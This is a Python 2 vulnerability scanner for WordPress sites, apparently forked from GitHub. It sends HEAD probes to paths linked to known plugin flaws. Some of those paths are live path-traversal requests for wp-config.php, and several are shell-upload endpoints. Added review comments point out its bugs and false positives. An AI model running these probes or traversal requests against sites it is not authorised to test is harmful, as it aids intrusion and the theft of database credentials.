forked from Sertanblir/-Python-Wordpress-Exploit-Scanner
Wordpress_Exploit_Scanner.py
import sys
import urllib2
import re
import time
import httplib
import random
# ANSI SGR escape sequences used to colour terminal output.
# The names follow the original author's Turkish labels; the notes in
# parentheses give the standard meaning of each SGR code.
W = '\033[0m' # white (SGR 0: reset all attributes)
R = '\033[31m' # red
G = '\033[1;32m' # dark green (SGR 1;32: bold green)
O = '\033[33m' # orange (SGR 33: yellow)
B = '\033[34m' # blue
P = '\033[35m' # purple (SGR 35: magenta)
C = '\033[36m' # labelled "yellow" by the author, but SGR 36 is cyan
GR = '\033[37m' # gray (SGR 37: white / light gray)
# HTTP status codes the scan loop treats as "path not present". Any other
# value, including 3xx redirects, 403 and 5xx, is reported as a hit.
BAD_RESP = [400,401,404]
def main(path):
    """Send one HEAD request for `path` on the global `host` and report the reply.

    `host` is a module-level global set by the script body; the text before
    its first "/" is used as the server name and the rest as a path prefix.
    Returns a (status, reason, Server header) tuple. Only the status line and
    headers are read, so the result says whether the server answered for the
    path, not what the resource contains.
    """
    print "[+] Test:",host.split("/",1)[1]+path
    try:
        # httplib.HTTP speaks plain HTTP only; nothing here handles TLS.
        h = httplib.HTTP(host.split("/",1)[0])
        # NOTE(review): `host` is forced to end in "/" and the table keys start
        # with "/", so the request path presumably begins with "//" - verify.
        h.putrequest("HEAD", "/"+host.split("/",1)[1]+path)
        # Host is the only header this function sets explicitly.
        h.putheader("Host", host.split("/",1)[0])
        h.endheaders()
        resp, reason, headers = h.getreply()
        return resp, reason, headers.get("Server")
    # NOTE(review): `except ()` names an empty tuple of exception types, so this
    # handler matches nothing and connection errors propagate to the caller.
    # If it did run, the function would fall through and return None, which
    # the caller's three-way unpacking cannot accept.
    except(), msg:
        print "Hata Olustu Napion mk:",msg
        pass
def timer():
    """Return the current local time formatted by time.asctime()."""
    seconds_since_epoch = time.time()
    local_struct = time.localtime(seconds_since_epoch)
    return time.asctime(local_struct)
def slowprint(s):
    """Write `s` followed by a newline to stdout one character at a time.

    Each character is flushed immediately and followed by a pause of 8/90 s,
    which gives a typewriter effect.
    """
    pause = 8./90
    text = s + '\n'
    out = sys.stdout
    for ch in text:
        out.write(ch)
        out.flush()
        time.sleep(pause)
# Startup banner: the title is printed in green, then the author credit is
# typed out slowly in red/orange. Runs at import time, before argument checks.
print G+"\n\t Wordpress Exploit Scanner "
slowprint (R+"\n\t Coded By "+O+"./vb.netEagLe"+O)
# Probe table: request path -> [advisory title, reference URL].
# The scan loop only checks whether each path answers a HEAD request, so an
# entry says "this path exists on the server", never "this version is
# vulnerable". Several paths (e.g. /wp-comments-post.php) appear to be stock
# WordPress files - TODO confirm - and would then match on any installation.
# The reference URLs are goo.gl short links as published by the author.
xpls = {
    # NOTE(review): this key is repeated further down; in a dict literal the
    # later entry replaces this one, so this title/reference is never reported
    # and len(xpls) is one less than the number of entries written here.
    "/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php" : ["WordPress CuckooTap Theme & eShop Arbitrary File Download","http://goo.gl/QRlPLT"],
    "/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php" : ["WordPress KenBurner Slider Arbitrary File Download","http://goo.gl/d7CXS9"] ,
    "/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html" : ["WordPress CK-And-SyntaxHighLighter Arbitrary File Upload","http://goo.gl/Ws5ke4"],
    "/wp-includes/js/plupload" : ["Wordpress Js plupload Cross Site Scripting","http://goo.gl/Uluyky"],
    "/wp-content/themes/myband/" : ["WordPress MyBand Theme Cross Site Scripting","http://goo.gl/dmuuaU"],
    "/wp-content/grand-media/" : ["WordPress Gmedia Gallery 1.2.1 Shell Upload","http://goo.gl/u6L2xz"] ,
    # Same key as the first entry; this is the one that survives.
    "/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php" : ["WordPress Slider Revolution Responsive 4.1.4 File Download","http://goo.gl/zl9bxe"],
    "/wp-content/plugins/Lead-Octopus-Power/lib/optin/optin_page.php" : ["WordPress Lead Octopus Power SQL Injection","http://goo.gl/a3hAB2"],
    "/wp-content/plugins/fbgorilla/game_play.php" : ["WordPress FBGorilla SQL Injection","http://goo.gl/tuKbKc"],
    # The reference here is the literal placeholder "link", not a URL.
    "/wp-content/plugins/tidio-gallery/popup-insert-help.php" : ["WordPress Tidio Gallery 1.1 XSS","link"] ,
    "/wp-content/plugins/download-manager/wpdm-add-new-file.php" : ["WordPress Download Manager 2.6.8 Shell Upload","http://goo.gl/N90axF"] ,
    "/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php" : ["WordPress Premium Gallery Manager Shell Upload","http://goo.gl/agwDOu"],
    "/wp-content/plugins/barclaycart/uploadify/uploadify.php" : ["WordPress Barclaycart Shell Upload","http://goo.gl/4SFV2q"],
    "/wp-content/plugins/page-flip-image-gallery/upload.php" : ["WordPress Page Flip Image Gallery Shell Upload","http://goo.gl/Z1TkAJ"],
    "/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.php" : ["WordPress dzs-videogallery Plugins Remote File Upload Vulnerability","http://goo.gl/hJzcYg"],
    "/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download" : ["WordPress wp-FileManager File Download","http://goo.gl/3D1oQ9"],
    "/wp-content/plugins/user-meta/framework/helper/uploader.php" : ["WordPress User Meta 1.1.1 Shell Upload","http://goo.gl/zyU1qR"] ,
    "/trunk/src/wp-includes/compat.php" : ["Wordpress 3.9.1 pluggable.php CSRF vulnerability" , "http://goo.gl/iL4uRs"] ,
    "/wp-comments-post.php" : ["Wordpress 3.9.1-CSRF vulnerability" , "http://goo.gl/XmlhhJ"] ,
    "/wp-content/plugins/wp-filemanager/" : ["wp-FileManager Download" , "http://goo.gl/MvH4eU"]}
# Script body: takes exactly one argument (the site to check), prints a usage
# line and exits with status 1 otherwise.
if len(sys.argv) != 2:
    print "Ornek: ketcap.py www.site.com\n"
    sys.exit(1)
# Normalise the argument into "server/prefix/" form for main().
# Only a literal "http://" is stripped; an "https://" prefix is left in place.
# rsplit("/",1)[0] discards whatever follows the last "/", so "site/blog"
# becomes "site" while "site/blog/" keeps the "blog" prefix.
host = sys.argv[1].replace("http://","").rsplit("/",1)[0]
if host[-1] != "/":
    host = host+"/"
print "\n[+] Hedef",host
print "[+] ketcap.py yukleniyor:",len(xpls)
print "\n[+] Scanning Vuln\n"
# One HEAD request per table entry, in dict iteration order.
for xpl,(poc,expl) in xpls.items():
    # `server` (the Server response header) is unpacked but never used.
    resp,reason,server = main(xpl)
    # Any status outside BAD_RESP is printed as a finding. That includes
    # redirects, 403 and 5xx replies, so a "hit" only shows that the server
    # answered for the path; it does not confirm the component's version or
    # that the advisory applies. Expect false positives.
    if resp not in BAD_RESP:
        print ""
        print G+"\t[+] Durum:",resp, reason
        print G+"\t[+] Vuln:",poc
        print G+"\t[+] ExpAdresi:",expl
        print W
    else:
        print ""
        print R+"\t[-] Durum:",resp, reason
        print W
print "\n[-] islemler basarili\n"